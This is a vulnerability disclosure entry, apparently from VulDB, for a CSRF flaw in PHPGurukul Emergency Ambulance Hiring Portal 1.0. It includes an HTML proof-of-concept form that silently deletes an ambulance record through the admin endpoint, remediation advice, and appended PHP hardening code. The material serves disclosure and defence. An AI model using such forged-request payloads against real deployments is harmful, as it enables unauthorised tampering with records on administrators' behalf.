Title | PHPGurukul Emergency Ambulance Hiring Portal 1.0 Cross Site Request Forgery |
---|
Description | Bug Description:
A Cross Site Request Forgery (CSRF) vulnerability in the "/admin/manage-ambulance.php" endpoint of PHPGurukul Emergency Ambulance Hiring Portal 1.0 allows attackers to "Delete an Ambulance" via a crafted HTML request.
Steps to Reproduce:
# Exploit Title: Cross Site Request Forgery (CSRF) vulnerability in Emergency Ambulance Hiring Portal
# Date: 28-03-2024
# Exploit Author: dhabaleshwardas
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/
# Version: 1.0
# Tested on: firefox/chrome/brave
# CVE:
To reproduce the attack:
1- Head to http://localhost/eahp/admin/manage-ambulance.php after logging into the admin account.
2- Here we will delete the ambulance with number "XYZ1234"; for that we use the HTML code below.
<html>
<!-- CSRF PoC -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/eahp/admin/manage-ambulance.php">
<input type="hidden" name="del" value="10" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3- We then open this HTML page and submit the form, and see that the record has been deleted.
4- This shows that the endpoint "/admin/manage-ambulance.php" is vulnerable to CSRF attack.
5- CSRF attacks can lead to unauthorized actions being performed on behalf of a user. An attacker could manipulate data within the application, leading to the creation, modification, or deletion of records.
Remediation:
1- Implement anti-CSRF tokens (also known as CSRF tokens or synchronizer tokens) in web forms. These tokens are unique per session and are embedded in the HTML form. The server validates the token with each form submission, ensuring that the request is legitimate.
2- Set the SameSite attribute on cookies to control when they are sent with cross-origin requests. This helps mitigate the risk of CSRF by preventing the automatic inclusion of cookies in cross-site requests. |
---|
Source | https://github.com/dhabaleshwar/Open-Source-Vulnerabilities/blob/main/eahp_csrf.md |
---|
User | dhabaleshwar (UID 58737) |
---|
Submission | 03/29/2024 12:05 PM (1 Year ago) |
---|
Moderation | 03/29/2024 03:27 PM (3 hours later) |
---|
Status | Accepted |
---|
VulDB Entry | 258682 [PHPGurukul Emergency Ambulance Hiring Portal 1.0 Manage Ambulance Page manage-ambulance.php del cross-site request forgery] |
---|
Points | 20 |
---|
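The two remediation items listed under Description above (a per-session synchronizer token and a SameSite session cookie), applied to a delete handler shaped like manage-ambulance.php. This is an added example, not code from the submission or from PHPGurukul; `$db`, `delete_ambulance()` and the table name are assumptions to be wired to the application's own connection and schema.

```php
<?php
// Added example, not code from the VulDB submission or from PHPGurukul:
// a synchronizer-token check plus SameSite session cookie for a delete handler
// shaped like manage-ambulance.php. $db, delete_ambulance() and the table name
// are assumptions; wire them to the application's own DB connection and schema.
session_set_cookie_params([
    'samesite' => 'Strict', // browser omits the cookie on cross-site requests
    'httponly' => true,
    'secure'   => true,     // requires HTTPS; relax only on a plain-HTTP test box
]);
session_start();

function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit, per session
    }
    return $_SESSION['csrf_token'];
}

function csrf_valid(?string $submitted): bool {
    // hash_equals() compares in constant time; a missing token is rejected
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

function delete_ambulance(PDO $db, int $id): void {
    $stmt = $db->prepare('DELETE FROM tblambulance WHERE id = :id'); // table name assumed
    $stmt->execute([':id' => $id]);
}

// Vulnerable shape, as the PoC above exploits it: a bare GET parameter deletes.
// if (isset($_GET['del'])) { delete_ambulance($db, (int) $_GET['del']); }

// Hardened shape: state change only on POST, and only with a valid token.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['del'])) {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    delete_ambulance($db, (int) $_POST['del']);
}
?>
<form method="post" action="manage-ambulance.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="hidden" name="del" value="10">
  <button type="submit">Delete ambulance</button>
</form>
```

With this in place the PoC form above fails twice over: it carries no token, and with SameSite=Strict the admin session cookie is not attached to the cross-site request at all.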